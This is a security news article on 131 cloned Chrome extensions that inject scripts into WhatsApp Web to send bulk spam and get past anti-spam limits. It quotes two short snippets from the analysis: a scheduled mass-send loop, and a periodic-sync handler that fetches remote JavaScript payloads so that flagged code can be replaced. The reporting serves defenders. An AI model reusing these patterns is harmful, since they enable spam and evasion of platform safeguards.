In recent months, cybersecurity experts have identified a significant increase in fraudulent Chrome extensions posing as legitimate tools for automating WhatsApp Web functions. A total of 131 such extensions have been discovered, each claiming to offer unique services but sharing a common codebase designed to send bulk messages and schedule communications without user consent.
These extensions operate by injecting custom scripts directly into the WhatsApp Web interface, effectively circumventing the platform’s built-in rate limits and anti-spam protections. They advertise features like message templates, scheduling options, and analytics dashboards, targeting small businesses—particularly in Brazil, where WhatsApp plays a crucial role in customer engagement.
Utilizing Chrome’s Manifest V3 service worker capabilities, these extensions run background tasks that schedule bulk messages without explicit user interaction. Analysts at Socket.dev have observed that the core module employs code snippets such as:
“`javascript
document.addEventListener(‘DOMContentLoaded’, () => {
const msgHelper = window.WPP.helpers.sendMessage;
scheduledMessages.forEach(({contact, text, time}) => {
setTimeout(() => msgHelper(contact, text), time);
});
});
“`
This script attaches to the page’s Document Object Model (DOM) and invokes WhatsApp’s internal APIs, blurring the line between legitimate automation and malicious spamming activities.
Further investigation revealed that the service worker fetches a remote configuration file from the operator’s infrastructure, allowing dynamic updates to message patterns and throttling parameters to evade detection. Despite Chrome Web Store policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained active as of mid-October 2025.
Each of these clones is marketed through polished landing pages that assure users of privacy compliance and rigorous code audits—claims that contradict platform guidelines. The distribution model resembles a franchise-like reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and manage subscription plans, while the original operator retains control over the backend.
Evasion and Persistence Tactics
The operators of these malicious extensions employ sophisticated strategies to evade detection. By adjusting send intervals, randomizing message content, and rotating publisher accounts, they maintain continuous operations despite takedown requests.
A key persistence tactic involves polling the operator’s server for updated JavaScript payloads at regular intervals:
“`javascript
self.addEventListener(‘periodicsync’, event => {
event.waitUntil(
fetch(configUrl)
.then(response => response.json())
.then(cfg => importScripts(cfg.payloadUrl))
);
});
“`
This Manifest V3 periodic sync registration ensures that even if Chrome flags a particular payload, the extension can reload an unflagged version from the remote server. Combined with varied naming conventions and thousands of active users across listings, this campaign exemplifies large-scale policy abuse and underscores the need for enhanced extension governance and user vigilance.
